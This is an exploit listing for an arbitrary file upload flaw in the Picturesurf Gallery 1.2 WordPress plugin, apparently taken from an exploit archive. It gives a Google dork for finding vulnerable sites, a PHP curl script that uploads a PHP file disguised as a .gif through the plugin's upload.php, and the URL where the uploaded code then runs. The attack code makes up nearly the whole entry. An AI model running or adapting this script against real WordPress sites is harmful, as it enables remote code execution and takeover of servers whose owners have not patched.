id: 18488
date: 06/07/2012
title: Wordpress Plugins - Picturesurf Gallery Arbitrary File Upload Vulnerability
author: Sammy FORGIT
cves: 

##################################################
# Description : Wordpress Plugins - Picturesurf Gallery Arbitrary File Upload Vulnerability
# Version : 1.2
# Link : http://wordpress.org/extend/plugins/picturesurf-gallery/
# Plugins : http://downloads.wordpress.org/plugin/picturesurf-gallery.zip
# Google Dork : inurl:/wp-content/plugins/picturesurf-gallery/
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

PostShell.php
<?php

$uploadfile="lo.php.gif";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
       array('Filedata'=>"@$uploadfile",
              'is_simple'=>'is_simple'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access :
http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/data/upload/lo.php.gif

lo.php.gif
<?php
phpinfo();
?>



#  0day.today [2023-03-24]  #